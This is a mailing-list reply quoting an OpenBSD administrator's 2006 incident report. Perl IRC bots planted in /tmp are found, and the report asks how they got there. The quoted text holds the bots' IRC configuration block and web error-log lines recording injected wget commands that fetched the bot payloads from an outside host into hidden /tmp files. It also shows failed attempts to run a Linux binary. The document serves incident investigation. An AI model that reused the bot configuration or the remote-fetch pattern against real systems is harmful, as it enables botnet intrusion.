Looks like you've made some new friends in Manaus, Brazil :-)
-p.
On Wed, Jan 04, 2006 at 02:50:01PM +0000, Gaby vanhegan wrote:
> To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173
> i386.
>
> I have some suspect files in /tmp, and I'm fairly sure that they
> shouldn't be there. Only thing I can't twig is what method the
> attackers used to get the files into that directory. The files are:
>
> ################################### Microsoft Search Worm - by br0k3d
> ###########################################
> #### ##### From the same author of LinuxDay Worm and
> other variants #### #######
>
> And:
>
> # ShellBOT
> # 0ldW0lf - [EMAIL PROTECTED]
> # - www.atrix-br.cjb.net
> # - www.atrix.cjb.net
>
> in /tmp/.cpanel and /tmp/.cpanel.tmp. Reading them through, they
> just look like IRC clients written in Perl that have some remote
> commands for DOS, and the likes. They connect to a chatroom and
> print some message or other. If anybody wants to have some fun, the
> main config block is:
>
> # IRC
> my @adms=("darkwoot", "br0k3d", "vipzen", "Nandokabala"); #nick dos
> administradores
> my @canais=("#gestapo");
> my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso..
> vai aparece com um numero radonamico no final
> my $ircname = 'SSSA';
> chop (my $realname = `uname -a`);
> $servidor='irc.agitamanaus.net' unless $servidor; #servidor d irc q
> vai c usadu c naum for especificado no argumento
> my $porta='6667'; #porta do servidor d irc
>
> My question is how did these files get into the machine. I have
> entries in the httpd error log that look like this:
>
> --05:10:47-- http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
> => `/tmp/.cpanel'
> Resolving arnold.dvclub.com.hk... done.
> Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
> HTTP request sent, awaiting response... --05:10:57-- http://
> arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
> => `/tmp/.cpanel.tmp'
> Resolving arnold.dvclub.com.hk... done.
> Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed:
> Connection timed out.
> Retrying.
>
> --05:12:13-- http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
> (try: 2) => `/tmp/.cpanel.tmp'
> Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
> Length: 3,355 [text/plain]
>
> 0K ... 100%
> 468.05 KB/s
>
> 05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]
>
> So something is clearly injecting a command into a script, and it is
> causing wget to run and fetch some files. There are more instances
> of the same thing, but they're all fetching a file from the same
> place (either .cpanel, .cpanel.tmp or .plesk).
>
> Because they're in the default Apache error log, the attacker must
> have hit a website on the machine that doesn't have an ErrorLog
> defined, or they hit the machine by IP instead of a hostname. I got
> a list of sites that have no error log (and would log to /var/www/
> logs/error_log) and checked their transfer logs. None of them had
> any entries in them that correspond to any of the times on the wget
> entries, so I learn nothing from this. There are earlier entries as
> well, doing the same thing, but to a different site
>
> I'm going to do a bulk grep on all the web server logs to see if
> anything about wget turns up in any of them, and if I can then work
> out which script on which site is causing the problem. As far as I
> can tell, there is no damage, but there are some entries like these
> in the error logs:
>
> /tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A<80><80>^44: not found
> /tmp/x44423[2]: 1?X<89>?<8D>T<81>^DP<83>??RQ??^A?: not found
> /tmp/x44423[4]: syntax error: `(' unexpected
>
> Am I right in thinking that these entries show somebody trying to run
> a Linux binary unsuccessfully? Good job I leave Linux emulation
> turned off... :)
>
> So, what's my next move? My daily/weekly security emails show
> nothing to be worried about, no changes to any system critical files
> or anything of that ilk. Where can I look for more information or
> clues? I know the machine is due for an upgrade, and that's next on
> my list. I would provide a dmesg but the machine has been up for a
> while with one full disk, so it's been pushed out of the end of the
> dmesg file.
>
> Gaby
>
> --
> Junkets for bunterish lickspittles since 1998!
> http://vanhegan.net/sudoku/
> http://weblog.vanhegan.net/
